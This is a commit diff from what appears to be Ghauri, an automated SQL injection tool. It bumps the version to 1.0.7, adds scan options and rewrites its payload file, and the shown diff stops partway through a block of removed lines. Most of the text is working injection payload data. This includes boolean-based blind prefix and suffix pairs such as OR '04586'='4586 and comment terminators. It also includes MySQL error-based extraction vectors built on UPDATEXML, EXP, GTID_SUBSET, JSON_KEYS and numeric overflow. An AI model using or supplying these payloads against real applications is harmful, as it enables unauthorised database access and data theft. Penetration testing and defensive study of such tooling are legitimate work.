  • Updated code quality, fixed an issue with character validation in boolean-based injection, updated case detection of the page ratio in boolean-based injection, bumped version to 1.0.7

  • r0oth3x49 committed 2 years ago
    6c587217
    1 parent d73ef80d
  • ■ ■ ■ ■
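--- a/ghauri/__init__.py
+++ b/ghauri/__init__.py
@@ -24,7 +24,7 @@
 
 """
 
-__version__ = "1.0.6"
+__version__ = "1.0.7"
 __author__ = "Nasir Khan (r0ot h3x49)"
 __license__ = "MIT"
 __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"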
  • ■ ■ ■ ■ ■ ■
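--- a/ghauri/common/config.py
+++ b/ghauri/common/config.py
@@ -40,6 +40,18 @@
 filepaths=None,
 proxy=None,
 text_only=False,
+string=None,
+not_string=None,
+code=None,
+match_ratio=None,
+retry=3,
+base=None,
+attack01=None,
+delay=0,
+timesec=5,
+timeout=30,
+backend=None,
+batch=False,
 ):
 self.vectors = vectors
 self.is_string = is_string
@@ -50,6 +62,16 @@
 self._session_filepath = None
 self.proxy = proxy
 self.text_only = text_only
+self.string = string
+self.not_string = not_string
+self.code = code
+self.match_ratio = match_ratio
+self.retry = retry
+self.base = base
+self.attack01 = attack01
+self.backend = backend
+self.batch = batch
+self.http_codes = {}
 
 @property
 def session_filepath(self):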
  • ■ ■ ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 223 lines
    224 224   "comments": [
    225 225   {"pref": " ", "suf": ""},
    226 226   {"pref": " ", "suf": "-- wXyW"},
     227 + {"pref": ") ", "suf": " AND (04586=4586"},
    227 228   {"pref": "' ", "suf": "-- wXyW"},
    228 229   {"pref": '" ', "suf": "-- wXyW"},
    229  - # {"pref": ") ", "suf": "-- wXyW"},
     230 + {"pref": ") ", "suf": "-- wXyW"},
    230 231   {"pref": "') ", "suf": "-- wXyW"},
    231  - # {"pref": '") ', "suf": "-- wXyW"},
    232  - {"pref": " ", "suf": " OR 3*2*1=6-- wXyW"},
    233  - {"pref": "' ", "suf": " OR '1'='1-- wXyW"},
    234  - {"pref": '" ', "suf": ' OR "1"="1-- wXyW'},
    235  - {"pref": "' ", "suf": " AND '1'='1-- wXyW"},
    236  - {"pref": '" ', "suf": ' AND "1"="1-- wXyW'},
    237  - # {"pref": ") ", "suf": " OR (1=1-- wXyW"},
    238  - # {"pref": ") ", "suf": " AND (1=1-- wXyW"},
    239  - # {"pref": "') ", "suf": " OR ('1'='1-- wXyW"},
    240  - # {"pref": '") ', "suf": ' OR ("1"="1-- wXyW'},
    241  - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"},
    242  - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'},
     232 + {"pref": '") ', "suf": "-- wXyW"},
     233 + {"pref": ") ", "suf": " OR (04586=4586"},
     234 + {"pref": "') ", "suf": " AND ('04586'='4586"},
     235 + {"pref": '") ', "suf": ' AND ("04586"="4586'},
     236 + {"pref": "' ", "suf": " AND '04586'='4586"},
     237 + {"pref": '" ', "suf": ' AND "04586"="4586'},
     238 + {"pref": "') ", "suf": " OR ('04586'='4586"},
     239 + {"pref": '") ', "suf": ' OR ("04586"="4586'},
     240 + {"pref": "' ", "suf": " OR '04586'='4586--"},
     241 + {"pref": '" ', "suf": ' OR "04586"="4586--'},
    243 242   ],
    244 243   "title": "AND boolean-based blind - WHERE or HAVING clause",
    245 244   "vector": "AND [INFERENCE]",
    skipped 9 lines
    255 254   {"pref": ") ", "suf": "-- wXyW"},
    256 255   {"pref": "') ", "suf": "-- wXyW"},
    257 256   {"pref": '") ', "suf": "-- wXyW"},
    258  - # {"pref": " ", "suf": " AND 3*2*1=6-- wXyW"},
    259  - # {"pref": "' ", "suf": " OR '1'='1-- wXyW"},
    260  - # {"pref": '" ', "suf": ' OR "1"="1-- wXyW'},
    261  - # {"pref": "' ", "suf": " AND '1'='1-- wXyW"},
    262  - # {"pref": '" ', "suf": ' AND "1"="1-- wXyW'},
    263  - # {"pref": ") ", "suf": " OR (1=1-- wXyW"},
    264  - # {"pref": ") ", "suf": " AND (1=1-- wXyW"},
    265  - # {"pref": "') ", "suf": " OR ('1'='1-- wXyW"},
    266  - # {"pref": '") ', "suf": ' OR ("1"="1-- wXyW'},
    267  - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"},
    268  - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'},
     257 + {"pref": ") ", "suf": " AND (04586=4586"},
     258 + # {"pref": ") ", "suf": " OR (04586=4586"},
     259 + {"pref": "') ", "suf": " AND ('04586'='4586"},
     260 + {"pref": '") ', "suf": ' AND ("04586"="4586'},
     261 + {"pref": "' ", "suf": " AND '04586'='4586"},
     262 + {"pref": '" ', "suf": ' AND "04586"="4586'},
     263 + # {"pref": "') ", "suf": " OR ('04586'='4586"},
     264 + # {"pref": '") ', "suf": ' OR ("04586"="4586'},
     265 + # {"pref": "' ", "suf": " OR '04586'='4586--"},
     266 + # {"pref": '" ', "suf": ' OR "04586"="4586--'},
    269 267   ],
    270 268   "title": "OR boolean-based blind - WHERE or HAVING clause (NOT)",
    271 269   "vector": "OR NOT [INFERENCE]",
    skipped 6 lines
    278 276   {"pref": " ", "suf": "-- wXyW"},
    279 277   {"pref": "' ", "suf": "-- wXyW"},
    280 278   {"pref": '" ', "suf": "-- wXyW"},
    281  - # {"pref": ") ", "suf": "-- wXyW"},
     279 + {"pref": ") ", "suf": "-- wXyW"},
    282 280   {"pref": "') ", "suf": "-- wXyW"},
    283  - # {"pref": '") ', "suf": "-- wXyW"},
    284  - {"pref": " ", "suf": " AND 3*2*1=6-- wXyW"},
    285  - {"pref": "' ", "suf": " OR '1'='1-- wXyW"},
    286  - {"pref": '" ', "suf": ' OR "1"="1-- wXyW'},
    287  - {"pref": "' ", "suf": " AND '1'='1-- wXyW"},
    288  - {"pref": '" ', "suf": ' AND "1"="1-- wXyW'},
    289  - # {"pref": ") ", "suf": " OR (1=1-- wXyW"},
    290  - # {"pref": ") ", "suf": " AND (1=1-- wXyW"},
    291  - # {"pref": "') ", "suf": " OR ('1'='1-- wXyW"},
    292  - # {"pref": '") ', "suf": ' OR ("1"="1-- wXyW'},
    293  - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"},
    294  - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'},
     281 + {"pref": '") ', "suf": "-- wXyW"},
     282 + {"pref": ") ", "suf": " AND (04586=4586"},
     283 + {"pref": ") ", "suf": " OR (04586=4586"},
     284 + {"pref": "') ", "suf": " AND ('04586'='4586"},
     285 + {"pref": '") ', "suf": ' AND ("04586"="4586'},
     286 + {"pref": "' ", "suf": " AND '04586'='4586"},
     287 + {"pref": '" ', "suf": ' AND "04586"="4586'},
     288 + {"pref": "') ", "suf": " OR ('04586'='4586"},
     289 + {"pref": '") ', "suf": ' OR ("04586"="4586'},
     290 + {"pref": "' ", "suf": " OR '04586'='4586--"},
     291 + {"pref": '" ', "suf": ' OR "04586"="4586--'},
    295 292   ],
    296 293   "title": "OR boolean-based blind - WHERE or HAVING clause",
    297 294   "vector": "OR [INFERENCE]",
    skipped 187 lines
    485 482   },
    486 483   ],
    487 484   "error-based": [
     485 + # {
     486 + # "payload": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     487 + # "comments": [
     488 + # # {"pref": " ", "suf": ""},
     489 + # {"pref": " ", "suf": "-- wXyW"},
     490 + # {"pref": " ", "suf": "#"},
     491 + # # {"pref": "' ", "suf": ""},
     492 + # {"pref": "' ", "suf": "-- wXyW"},
     493 + # {"pref": "' ", "suf": "#"},
     494 + # # {"pref": '" ', "suf": ""},
     495 + # {"pref": '" ', "suf": "-- wXyW"},
     496 + # {"pref": '" ', "suf": "#"},
     497 + # # {"pref": ") ", "suf": ""},
     498 + # {"pref": ") ", "suf": "-- wXyW"},
     499 + # {"pref": ") ", "suf": "#"},
     500 + # # {"pref": "') ", "suf": ""},
     501 + # {"pref": "') ", "suf": "-- wXyW"},
     502 + # {"pref": "') ", "suf": "#"},
     503 + # # {"pref": '") ', "suf": ""},
     504 + # {"pref": '") ', "suf": "-- wXyW"},
     505 + # {"pref": '") ', "suf": "#"},
     506 + # ],
     507 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)",
     508 + # "vector": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     509 + # "dbms": "MySQL",
     510 + # },
     511 + # {
     512 + # "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     513 + # "comments": [
     514 + # # {"pref": " ", "suf": ""},
     515 + # {"pref": " ", "suf": "-- wXyW"},
     516 + # {"pref": " ", "suf": "#"},
     517 + # # {"pref": "' ", "suf": ""},
     518 + # {"pref": "' ", "suf": "-- wXyW"},
     519 + # {"pref": "' ", "suf": "#"},
     520 + # # {"pref": '" ', "suf": ""},
     521 + # {"pref": '" ', "suf": "-- wXyW"},
     522 + # {"pref": '" ', "suf": "#"},
     523 + # # {"pref": ") ", "suf": ""},
     524 + # {"pref": ") ", "suf": "-- wXyW"},
     525 + # {"pref": ") ", "suf": "#"},
     526 + # # {"pref": "') ", "suf": ""},
     527 + # {"pref": "') ", "suf": "-- wXyW"},
     528 + # {"pref": "') ", "suf": "#"},
     529 + # # {"pref": '") ', "suf": ""},
     530 + # {"pref": '") ', "suf": "-- wXyW"},
     531 + # {"pref": '") ', "suf": "#"},
     532 + # ],
     533 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)",
     534 + # "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     535 + # "dbms": "MySQL",
     536 + # },
     537 + # {
     538 + # "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
     539 + # "comments": [
     540 + # # {"pref": " ", "suf": ""},
     541 + # {"pref": " ", "suf": "-- wXyW"},
     542 + # {"pref": " ", "suf": "#"},
     543 + # # {"pref": "' ", "suf": ""},
     544 + # {"pref": "' ", "suf": "-- wXyW"},
     545 + # {"pref": "' ", "suf": "#"},
     546 + # # {"pref": '" ', "suf": ""},
     547 + # {"pref": '" ', "suf": "-- wXyW"},
     548 + # {"pref": '" ', "suf": "#"},
     549 + # # {"pref": ") ", "suf": ""},
     550 + # {"pref": ") ", "suf": "-- wXyW"},
     551 + # {"pref": ") ", "suf": "#"},
     552 + # # {"pref": "') ", "suf": ""},
     553 + # {"pref": "') ", "suf": "-- wXyW"},
     554 + # {"pref": "') ", "suf": "#"},
     555 + # # {"pref": '") ', "suf": ""},
     556 + # {"pref": '") ', "suf": "-- wXyW"},
     557 + # {"pref": '") ', "suf": "#"},
     558 + # ],
     559 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)",
     560 + # "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
     561 + # "dbms": "MySQL",
     562 + # },
     563 + # {
     564 + # "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
     565 + # "comments": [
     566 + # # {"pref": " ", "suf": ""},
     567 + # {"pref": " ", "suf": "-- wXyW"},
     568 + # {"pref": " ", "suf": "#"},
     569 + # # {"pref": "' ", "suf": ""},
     570 + # {"pref": "' ", "suf": "-- wXyW"},
     571 + # {"pref": "' ", "suf": "#"},
     572 + # # {"pref": '" ', "suf": ""},
     573 + # {"pref": '" ', "suf": "-- wXyW"},
     574 + # {"pref": '" ', "suf": "#"},
     575 + # # {"pref": ") ", "suf": ""},
     576 + # {"pref": ") ", "suf": "-- wXyW"},
     577 + # {"pref": ") ", "suf": "#"},
     578 + # # {"pref": "') ", "suf": ""},
     579 + # {"pref": "') ", "suf": "-- wXyW"},
     580 + # {"pref": "') ", "suf": "#"},
     581 + # # {"pref": '") ', "suf": ""},
     582 + # {"pref": '") ', "suf": "-- wXyW"},
     583 + # {"pref": '") ', "suf": "#"},
     584 + # ],
     585 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)",
     586 + # "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
     587 + # "dbms": "MySQL",
     588 + # },
     589 + # {
     590 + # "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
     591 + # "comments": [
     592 + # # {"pref": " ", "suf": ""},
     593 + # {"pref": " ", "suf": "-- wXyW"},
     594 + # {"pref": " ", "suf": "#"},
     595 + # # {"pref": "' ", "suf": ""},
     596 + # {"pref": "' ", "suf": "-- wXyW"},
     597 + # {"pref": "' ", "suf": "#"},
     598 + # # {"pref": '" ', "suf": ""},
     599 + # {"pref": '" ', "suf": "-- wXyW"},
     600 + # {"pref": '" ', "suf": "#"},
     601 + # # {"pref": ") ", "suf": ""},
     602 + # {"pref": ") ", "suf": "-- wXyW"},
     603 + # {"pref": ") ", "suf": "#"},
     604 + # # {"pref": "') ", "suf": ""},
     605 + # {"pref": "') ", "suf": "-- wXyW"},
     606 + # {"pref": "') ", "suf": "#"},
     607 + # # {"pref": '") ', "suf": ""},
     608 + # {"pref": '") ', "suf": "-- wXyW"},
     609 + # {"pref": '") ', "suf": "#"},
     610 + # ],
     611 + # "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)",
     612 + # "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
     613 + # "dbms": "MySQL",
     614 + # },
     615 + # {
     616 + # "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
     617 + # "comments": [
     618 + # # {"pref": " ", "suf": ""},
     619 + # {"pref": " ", "suf": "-- wXyW"},
     620 + # {"pref": " ", "suf": "#"},
     621 + # # {"pref": "' ", "suf": ""},
     622 + # {"pref": "' ", "suf": "-- wXyW"},
     623 + # {"pref": "' ", "suf": "#"},
     624 + # # {"pref": '" ', "suf": ""},
     625 + # {"pref": '" ', "suf": "-- wXyW"},
     626 + # {"pref": '" ', "suf": "#"},
     627 + # # {"pref": ") ", "suf": ""},
     628 + # {"pref": ") ", "suf": "-- wXyW"},
     629 + # {"pref": ") ", "suf": "#"},
     630 + # # {"pref": "') ", "suf": ""},
     631 + # {"pref": "') ", "suf": "-- wXyW"},
     632 + # {"pref": "') ", "suf": "#"},
     633 + # # {"pref": '") ', "suf": ""},
     634 + # {"pref": '") ', "suf": "-- wXyW"},
     635 + # {"pref": '") ', "suf": "#"},
     636 + # ],
     637 + # "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)",
     638 + # "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
     639 + # "dbms": "MySQL",
     640 + # },
     641 + # {
     642 + # "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
     643 + # "comments": [
     644 + # # {"pref": " ", "suf": ""},
     645 + # {"pref": " ", "suf": "-- wXyW"},
     646 + # {"pref": " ", "suf": "#"},
     647 + # # {"pref": "' ", "suf": ""},
     648 + # {"pref": "' ", "suf": "-- wXyW"},
     649 + # {"pref": "' ", "suf": "#"},
     650 + # # {"pref": '" ', "suf": ""},
     651 + # {"pref": '" ', "suf": "-- wXyW"},
     652 + # {"pref": '" ', "suf": "#"},
     653 + # # {"pref": ") ", "suf": ""},
     654 + # {"pref": ") ", "suf": "-- wXyW"},
     655 + # {"pref": ") ", "suf": "#"},
     656 + # # {"pref": "') ", "suf": ""},
     657 + # {"pref": "') ", "suf": "-- wXyW"},
     658 + # {"pref": "') ", "suf": "#"},
     659 + # # {"pref": '") ', "suf": ""},
     660 + # {"pref": '") ', "suf": "-- wXyW"},
     661 + # {"pref": '") ', "suf": "#"},
     662 + # ],
     663 + # "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)",
     664 + # "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
     665 + # "dbms": "MySQL",
     666 + # },
     667 + # {
     668 + # "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
     669 + # "comments": [
     670 + # # {"pref": " ", "suf": ""},
     671 + # {"pref": " ", "suf": "-- wXyW"},
     672 + # {"pref": " ", "suf": "#"},
     673 + # # {"pref": "' ", "suf": ""},
     674 + # {"pref": "' ", "suf": "-- wXyW"},
     675 + # {"pref": "' ", "suf": "#"},
     676 + # # {"pref": '" ', "suf": ""},
     677 + # {"pref": '" ', "suf": "-- wXyW"},
     678 + # {"pref": '" ', "suf": "#"},
     679 + # # {"pref": ") ", "suf": ""},
     680 + # {"pref": ") ", "suf": "-- wXyW"},
     681 + # {"pref": ") ", "suf": "#"},
     682 + # # {"pref": "') ", "suf": ""},
     683 + # {"pref": "') ", "suf": "-- wXyW"},
     684 + # {"pref": "') ", "suf": "#"},
     685 + # # {"pref": '") ', "suf": ""},
     686 + # {"pref": '") ', "suf": "-- wXyW"},
     687 + # {"pref": '") ', "suf": "#"},
     688 + # ],
     689 + # "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)",
     690 + # "vector": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
     691 + # "dbms": "MySQL",
     692 + # },
     693 + # {
     694 + # "payload": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     695 + # "comments": [
     696 + # # {"pref": " ", "suf": ""},
     697 + # {"pref": " ", "suf": "-- wXyW"},
     698 + # {"pref": " ", "suf": "#"},
     699 + # # {"pref": "' ", "suf": ""},
     700 + # {"pref": "' ", "suf": "-- wXyW"},
     701 + # {"pref": "' ", "suf": "#"},
     702 + # # {"pref": '" ', "suf": ""},
     703 + # {"pref": '" ', "suf": "-- wXyW"},
     704 + # {"pref": '" ', "suf": "#"},
     705 + # # {"pref": ") ", "suf": ""},
     706 + # {"pref": ") ", "suf": "-- wXyW"},
     707 + # {"pref": ") ", "suf": "#"},
     708 + # # {"pref": "') ", "suf": ""},
     709 + # {"pref": "') ", "suf": "-- wXyW"},
     710 + # {"pref": "') ", "suf": "#"},
     711 + # # {"pref": '") ', "suf": ""},
     712 + # {"pref": '") ', "suf": "-- wXyW"},
     713 + # {"pref": '") ', "suf": "#"},
     714 + # ],
     715 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)",
     716 + # "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     717 + # "dbms": "MySQL",
     718 + # },
     719 + # {
     720 + # "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     721 + # "comments": [
     722 + # # {"pref": " ", "suf": ""},
     723 + # {"pref": " ", "suf": "-- wXyW"},
     724 + # {"pref": " ", "suf": "#"},
     725 + # # {"pref": "' ", "suf": ""},
     726 + # {"pref": "' ", "suf": "-- wXyW"},
     727 + # {"pref": "' ", "suf": "#"},
     728 + # # {"pref": '" ', "suf": ""},
     729 + # {"pref": '" ', "suf": "-- wXyW"},
     730 + # {"pref": '" ', "suf": "#"},
     731 + # # {"pref": ") ", "suf": ""},
     732 + # {"pref": ") ", "suf": "-- wXyW"},
     733 + # {"pref": ") ", "suf": "#"},
     734 + # # {"pref": "') ", "suf": ""},
     735 + # {"pref": "') ", "suf": "-- wXyW"},
     736 + # {"pref": "') ", "suf": "#"},
     737 + # # {"pref": '") ', "suf": ""},
     738 + # {"pref": '") ', "suf": "-- wXyW"},
     739 + # {"pref": '") ', "suf": "#"},
     740 + # ],
     741 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (DOUBLE)",
     742 + # "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     743 + # "dbms": "MySQL",
     744 + # },
    488 745   {
    489  - "payload": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     746 + "payload": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e),0)",
    490 747   "comments": [
    491 748   # {"pref": " ", "suf": ""},
    492 749   {"pref": " ", "suf": "-- wXyW"},
     750 + {"pref": " ", "suf": "#"},
    493 751   # {"pref": "' ", "suf": ""},
    494 752   {"pref": "' ", "suf": "-- wXyW"},
     753 + {"pref": "' ", "suf": "#"},
    495 754   # {"pref": '" ', "suf": ""},
    496 755   {"pref": '" ', "suf": "-- wXyW"},
     756 + {"pref": '" ', "suf": "#"},
    497 757   # {"pref": ") ", "suf": ""},
    498 758   {"pref": ") ", "suf": "-- wXyW"},
     759 + {"pref": ") ", "suf": "#"},
    499 760   # {"pref": "') ", "suf": ""},
    500 761   {"pref": "') ", "suf": "-- wXyW"},
     762 + {"pref": "') ", "suf": "#"},
    501 763   # {"pref": '") ', "suf": ""},
    502 764   {"pref": '") ', "suf": "-- wXyW"},
     765 + {"pref": '") ', "suf": "#"},
    503 766   ],
    504  - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)",
    505  - "vector": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
     767 + "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
     768 + "vector": "AND UPDATEXML(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e),0)",
    506 769   "dbms": "MySQL",
    507 770   },
    508 771   {
    509  - "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)",
     772 + "payload": "AND UPDATEXML(0,CONCAT_WS('r0oth3x49'),0)",
    510 773   "comments": [
    511 774   # {"pref": " ", "suf": ""},
    512 775   {"pref": " ", "suf": "-- wXyW"},
     776 + {"pref": " ", "suf": "#"},
    513 777   # {"pref": "' ", "suf": ""},
    514 778   {"pref": "' ", "suf": "-- wXyW"},
     779 + {"pref": "' ", "suf": "#"},
    515 780   # {"pref": '" ', "suf": ""},
    516 781   {"pref": '" ', "suf": "-- wXyW"},
     782 + {"pref": '" ', "suf": "#"},
    517 783   # {"pref": ") ", "suf": ""},
    518 784   {"pref": ") ", "suf": "-- wXyW"},
     785 + {"pref": ") ", "suf": "#"},
    519 786   # {"pref": "') ", "suf": ""},
    520 787   {"pref": "') ", "suf": "-- wXyW"},
     788 + {"pref": "') ", "suf": "#"},
    521 789   # {"pref": '") ', "suf": ""},
    522 790   {"pref": '") ', "suf": "-- wXyW"},
     791 + {"pref": '") ', "suf": "#"},
    523 792   ],
    524  - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)",
    525  - "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)",
    526  - "dbms": "MySQL",
    527  - },
    528  - {
    529  - "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
    530  - "comments": [
    531  - # {"pref": " ", "suf": ""},
    532  - {"pref": " ", "suf": "-- wXyW"},
    533  - # {"pref": "' ", "suf": ""},
    534  - {"pref": "' ", "suf": "-- wXyW"},
    535  - # {"pref": '" ', "suf": ""},
    536  - {"pref": '" ', "suf": "-- wXyW"},
    537  - # {"pref": ") ", "suf": ""},
    538  - {"pref": ") ", "suf": "-- wXyW"},
    539  - # {"pref": "') ", "suf": ""},
    540  - {"pref": "') ", "suf": "-- wXyW"},
    541  - # {"pref": '") ', "suf": ""},
    542  - {"pref": '") ', "suf": "-- wXyW"},
    543  - ],
    544  - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)",
    545  - "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
    546  - "dbms": "MySQL",
    547  - },
    548  - {
    549  - "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))",
    550  - "comments": [
    551  - # {"pref": " ", "suf": ""},
    552  - {"pref": " ", "suf": "-- wXyW"},
    553  - # {"pref": "' ", "suf": ""},
    554  - {"pref": "' ", "suf": "-- wXyW"},
    555  - # {"pref": '" ', "suf": ""},
    556  - {"pref": '" ', "suf": "-- wXyW"},
    557  - # {"pref": ") ", "suf": ""},
    558  - {"pref": ") ", "suf": "-- wXyW"},
    559  - # {"pref": "') ", "suf": ""},
    560  - {"pref": "') ", "suf": "-- wXyW"},
    561  - # {"pref": '") ', "suf": ""},
    562  - {"pref": '") ', "suf": "-- wXyW"},
    563  - ],
    564  - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)",
    565  - "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))",
    566  - "dbms": "MySQL",
    567  - },
    568  - {
    569  - "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
    570  - "comments": [
    571  - # {"pref": " ", "suf": ""},
    572  - {"pref": " ", "suf": "-- wXyW"},
    573  - # {"pref": "' ", "suf": ""},
    574  - {"pref": "' ", "suf": "-- wXyW"},
    575  - # {"pref": '" ', "suf": ""},
    576  - {"pref": '" ', "suf": "-- wXyW"},
    577  - # {"pref": ") ", "suf": ""},
    578  - {"pref": ") ", "suf": "-- wXyW"},
    579  - # {"pref": "') ", "suf": ""},
    580  - {"pref": "') ", "suf": "-- wXyW"},
    581  - # {"pref": '") ', "suf": ""},
    582  - {"pref": '") ', "suf": "-- wXyW"},
    583  - ],
    584  - "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)",
    585  - "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
    586  - "dbms": "MySQL",
    587  - },
    588  - {
    589  - "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)",
    590  - "comments": [
    591  - # {"pref": " ", "suf": ""},
    592  - {"pref": " ", "suf": "-- wXyW"},
    593  - # {"pref": "' ", "suf": ""},
    594  - {"pref": "' ", "suf": "-- wXyW"},
    595  - # {"pref": '" ', "suf": ""},
    596  - {"pref": '" ', "suf": "-- wXyW"},
    597  - # {"pref": ") ", "suf": ""},
    598  - {"pref": ") ", "suf": "-- wXyW"},
    599  - # {"pref": "') ", "suf": ""},
    600  - {"pref": "') ", "suf": "-- wXyW"},
    601  - # {"pref": '") ', "suf": ""},
    602  - {"pref": '") ', "suf": "-- wXyW"},
    603  - ],
    604  - "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)",
    605  - "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)",
    606  - "dbms": "MySQL",
    607  - },
    608  - {
    609  - "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))",
    610  - "comments": [
    611  - # {"pref": " ", "suf": ""},
    612  - {"pref": " ", "suf": "-- wXyW"},
    613  - # {"pref": "' ", "suf": ""},
    614  - {"pref": "' ", "suf": "-- wXyW"},
    615  - # {"pref": '" ', "suf": ""},
    616  - {"pref": '" ', "suf": "-- wXyW"},
    617  - # {"pref": ") ", "suf": ""},
    618  - {"pref": ") ", "suf": "-- wXyW"},
    619  - # {"pref": "') ", "suf": ""},
    620  - {"pref": "') ", "suf": "-- wXyW"},
    621  - # {"pref": '") ', "suf": ""},
    622  - {"pref": '") ', "suf": "-- wXyW"},
    623  - ],
    624  - "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)",
    625  - "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))",
    626  - "dbms": "MySQL",
    627  - },
